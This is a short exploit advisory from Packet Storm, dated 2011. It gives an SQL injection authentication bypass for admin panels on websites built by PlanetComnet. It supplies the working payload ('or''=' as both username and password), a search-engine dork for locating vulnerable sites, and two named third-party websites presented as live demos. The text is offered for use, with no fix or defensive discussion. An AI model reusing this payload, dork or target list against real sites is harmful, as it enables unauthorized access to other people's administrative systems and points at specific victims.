PlanetComnet SQL Injection

2011-07-26T00:00:00
ID PACKETSTORM:103427
Type packetstorm
Reporter CriminalCoder
Modified 2011-07-26T00:00:00

Description

                                        
                                            `# Exploit Title: PlanetComnet Admin Auth Bypass  
# Date: 14 June 2011  
# Author: CriminalCoder  
# Category: WebApps  
# Software Link: www.planetcomnet.in  
# Dork: inurl:admin.asp "Designed & Hosted by PlanetComnet"  
# Tested on: Windows Xp SP3# Home: beyz4de.wordpress.com  
  
[+] Default admin panel: http://localhost/admin.asp  
  
./ ByPass the admin auth by using   
  
Username : 'or''='Password : 'or''='  
  
./ Live Demo ;  
  
http://www.laxmimedical.com/admin.asphttp://www.mehrabandhu.in/admin.asp  
  
Greetz: NosLeeP++ ~ Redd.é ~ SanaLTahriP ~ TechnicaL ~ TheMirkin  
  
`